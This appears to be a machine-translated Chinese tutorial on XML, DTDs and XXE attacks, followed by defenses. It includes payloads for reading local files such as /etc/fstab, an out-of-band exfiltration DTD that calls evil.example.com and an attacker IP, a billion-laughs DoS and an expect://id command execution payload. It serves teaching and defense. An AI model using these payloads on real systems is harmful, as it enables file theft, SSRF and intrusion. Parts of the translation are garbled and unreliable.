Author: King Jiyue
Estimated contribution fee: 400RMB
Submission method: send an email to Linwei Chen 360.cn, or log in to the web page for online submission
Have you ever heard of an XML injection attack, or do you know one thing or the other?
Now let's start with the basic knowledge of XML, step by step to understand the principles and methods of XML attacks.
This article is mainly aimed at literacy. Please spray lightly. If you have any mistakes, please point out.
XML is designed to transmit and store data, and its focus is the content of data.
Html is designed to display data, with the focus on the appearance of the data.
XML separates data from HTML.
XML is a software and hardware independent information transmission tool.
<bookstore> <!--根元素-->
<book category="COOKING"> <!--bookstore的子元素,category为属性-->
<title>Everyday Italian</title> <!--book的子元素,lang为属性-->
<author>Giada De Laurentiis</author> <!--book的子元素-->
<year>2005</year> <!--book的子元素-->
<price>30.00</price> <!--book的子元素-->
</book> <!--book的结束-->
</bookstore> <!--bookstore的结束-->
In XML, some characters have special meanings. To avoid this error, use entity references instead of special characters
Schedule 1
Note to table 1: in XML, only the characters "< and" & "are indeed illegal. The greater than sign is legal, but it's a good practice to replace it with an entity reference.
Legal XML documents are "well formed" XML documents, which also follow the syntax rules of document type definition (DTD).
DTD introduction
Document type definition (DTD) can define legal XML document building module. It uses a set of legal elements to define the structure of the document.
DTD can be declared in lines in an XML document or as an external reference.
XML document instance with DTD
<?xml version="1.0"?>
<!DOCTYPE note [<!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->
]>
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>
Example
Source code
When the DTD is located outside the XML source file, it is encapsulated in a DOCTYPE definition through the following syntax
<!DOCTYPE root-element SYSTEM "filename">
External DTD instance
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd"><!--申明语句-->
<note>
<to>Dave</to>
<from>Tom</from>
<heading>Reminder</heading>
<body>You are a good man</body>
</note>
"Note. DTD" file
<!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->
Example
Source code
DTD file
PCDATA means the parsed character data. PCDATA is the text that will be parsed by the parser. The text will be examined by the parser for entities and tags. Labels in text are treated as tags, and entities are expanded. However, the parsed character data should not contain any &, < or > characters; they need to be replaced with & amp;, & lt; and & gt; entities, respectively.
CDATA means character data. CDATA is text that will not be parsed by the parser. Tags in these texts are not treated as tags, and the entities in them are not expanded.
DTD element
Note: because it is only an extension, it only shows some common element syntax
DTD - properties
Property declarations use the following syntax:
<!ATTLIST 元素名称 属性名称 属性类型 默认值>
DTD example:
<!ATTLIST payment type CDATA "check">
XML example:
<payment type="check" />
The following are options for property types:
The default value parameter can use the following values:
DTD – entity (important)
Entities are variables that define shortcuts that reference plain text or special characters.
An entity reference is a reference to an entity.
Entities can be declared internally or externally.
Introduction to schema (XSD)
XML schema is the substitute of DTD based on XML.
XML schema describes the structure of an XML document.
The XML Schema language can also be referenced as an XSD (XML Schema Definition)
But at present, XSD's xxE attack on this article is not too relevant. If you want to know more about it, you can go to http://www.w3cschool.cn/xmlschema/ or http://www.phpstudy.net/e/schema/ to learn
Attack routine
General skills:
1. Remote file reading by referencing external entities
2. URL request (through which SSRF can be initiated)
3. Parameter entity
4. Include external resources through xinclude
5.DoS
1. External entity reference
Remote file content can be obtained through external entity reference
Local experiment:
The content in the test.txt file is 123admin
But there is a problem. If the content format of the file is too complex, XML parsing will fail (for example, the content contains spaces, some special characters < > &; and so on)
In fact, there are bypass methods. As mentioned above, parameter entities can be used. The specific content will be introduced later
Another method we know is to use PHP pseudo protocol, PHP: / / filter to read the contents of the file (the contents of the file are all characters after the base64 filter, without format interference)
2. URL request (SSRF)
A request can be initiated directly by using an external entity reference, because many XML parsers force the request when they read the module that references the external file
Local experiment:
First, listen to port 1231 at 172.16.169.153:
Using XML to make request at 172.16.169.142 (just put XML into browser)
As shown in the figure above, the browser has been loading content because there is no information returned on the 153 machine
1231 port status of 172.16.169.153:
This SSRF can be noted, because in most attacks on XML, external entity references are used. What about forbidding external entity references when loading xml directly?
In this case, most attacks will fail, but SSRF will not
Don't forget that there is another way to request external resources. Use DOCTYPE directly
3. DoS
Any method that can occupy a large amount of server resources can cause DOS. The principle is recursive reference
The lol entity also has the "lol" string, and then a lol2 entity references a lol entity 10 times, a lol3 entity references a lol2 entity 10 times, at this time a lol3 entity contains 10 ^ 2 "lols", and so on, a lol9 entity contains 10 ^ 8 "lol" strings
So, reference lol9, boom
4. Parameter entity
Parameter entity. In the previous introduction of remote file reading, it can bypass the limitation of parsing failure caused by the complexity of file content
Parameter entities start with% we only need to follow two principles when using parameter entities:
1. Parameter entities can only be used in DTD declarations. 2. Parameter entities can no longer be referenced in parameter entities.
As shown in the figure, / etc / fstab is a file with complex content. If you directly use system to request a remote file, you will make an error in parsing, that is, you cannot read the file content.
Then you can use parameter entities to bypass XML's strict syntax rules
In fact, the process is very simple:
Content of start parameter entity: <! [CDATA[
Contents of the goodies parameter entity: File: / / / etc / fastab (use the file protocol to read the file)
End parameter entity content:]] >
Then a DTD parameter entity is defined, and the system is used to issue to obtain the content of combine.dtd
The DTD parameter entity is referenced in the DTD. At this time, the DTD in the source file should be as follows:
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/fstab">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
<!ENTITY all "%start;%goodies;%end;">
Finally, the source file references all common entities to cause file reading:
<roottag><! [CDATA["/etc/fstab文件的内容"]]></roottag>
This CDATA means to add attributes to the file content: ordinary characters that are not parsed
In this way, the reference of parameter entity does not need to keep the XML closed when parsing the XML document, and the XML interpreter will directly ignore the syntax rules of the file content, achieving the purpose of bypassing
Attacker IP:
http://192.168.229.130/
eval.dtd
1.php
Server IP
http://192.168.229.128/
2.php
There is a file called eval.dtd in the attacker's web directory for attack, then upload 2.php to the server and execute 2.php
It doesn't matter if you make a mistake.
Here's the code:
1.php:
Simply accept the content passed by the get parameter and save it in 1.txt
The content of eval.dtd file is
Note here that when using parameter entity, it needs to use & ා X25 instead of% in the format of reference entity. Because nested reference external parameter entity, if directly used%, the parameter entity name will not be found during reference
The function is to apply the accepted external file entity to the% file of 1. PHP? File =
In this way, the content uploaded from the server will be transferred to the file parameter and saved to 1.txt
In the 2.php file
The first entity is used to read the server local file test.txt
Second for referencing remote DTD files
Secondly, we need to pay attention to the order of entity utilization. First, execute the code named DTD entity reference attacker eval.dtd to obtain the execution method of entity send: http://192.168.229.130/1.php? File =% file;
Then reference the content obtained by the file entity to 192.168.229.130/1.php? File
At this point, the attacker server saves 1.txt
As mentioned earlier, when there are spaces and angle brackets in reading files, this way of directly reading content will report an error
Display the invalid URL. You can't catch the package accessing http://192.168.229.130/1.php? File = blending software on the browser
Combined with the previous protocol application, you can use the common PHP: / / filter to read Base64 encoding
as follows
Just decode.
Just a few protocols are selected as examples. All protocols here can be used.
Here are some English documents and examples about the xxE vulnerability:
http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf
Http://www.2cto.com/article/201506/404505.html - Z-blog arbitrary file read
5. Include external resources through xinclude
Xinclude based file contains another set of XML syntax constraints: XML schema
Xinclude provides a more convenient way to retrieve data (no need to worry about data incompleteness and cause the parser to throw an error) and we can force reference to the file type through the parse attribute.
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>
</root>
However, xinclude needs to be turned on manually, and all XML parsers are turned off by default.
PHP and Java environment
Extension protocol supported by PHP
Java&Xerces
The default XML parser Under Oracle's Java runtime environment is Xerces, an Apache project. Xerces and Java provide a series of features, which can lead to some serious security problems. The above attack techniques (DOCTYPES for SSRF, file reading, and data out of parameter entities) can be used freely under the default configuration of Java. Java / Xerces also supports xinclude, but it needs setxincludeaware (true) and setnamespaceaware (true).
Rce of PHP & expect
Unfortunately, this extension is not installed by default. However, the xxE vulnerability of this extension can execute arbitrary commands.
<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
<file>&cmd;</file>
</dir>
There are also python,. Net environment, etc
defense
1. Directly use the method provided by the development language to disable external entities
In fact, it can't defend the SSRF made by XML
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
2 filter XML data submitted by users
Sensitive Keywords: <! DOCTYPE, <! Entity, system, public
summary
XML attacks are mostly caused by external resource requests from parsers, and some protocol features can easily bypass XML format requirements. The main keywords are DOCTYPE (DTD declaration), entity (entity declaration), system, public (external resource request).
Various routines are triggered by flexible references to common entities and parameter entities
Source of data
http://www.w3cschool.cn/xml
http://www.w3cschool.cn/dtd
http://www.phpstudy.net/e/xml
http://www.w3school.com.cn/dtd/dtd_intro.asp
https://security.tencent.com/index.php/blog/msg/69
http://blog.csdn.net/u011721501/article/details/43775691
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://msdn.microsoft.com/en-us/magazine/ee335713.aspx
https://www.vsecurity.com//download/papers/XMLDTDEntityAttacks.pdf
http://www.myhack58.com/Article/html/3/8/2016/70831_3.htm
http://www.freebuf.com/articles/web/97833.html
http://blog.csdn.net/lijizh1013/article/details/8056304
http://www.w3school.com.cn/dtd/dtd_intro.asp
http://www.w3school.com.cn/schema/schema_intro.asp
http://www.cnblogs.com/mengdd/archive/2013/05/30/3107361.html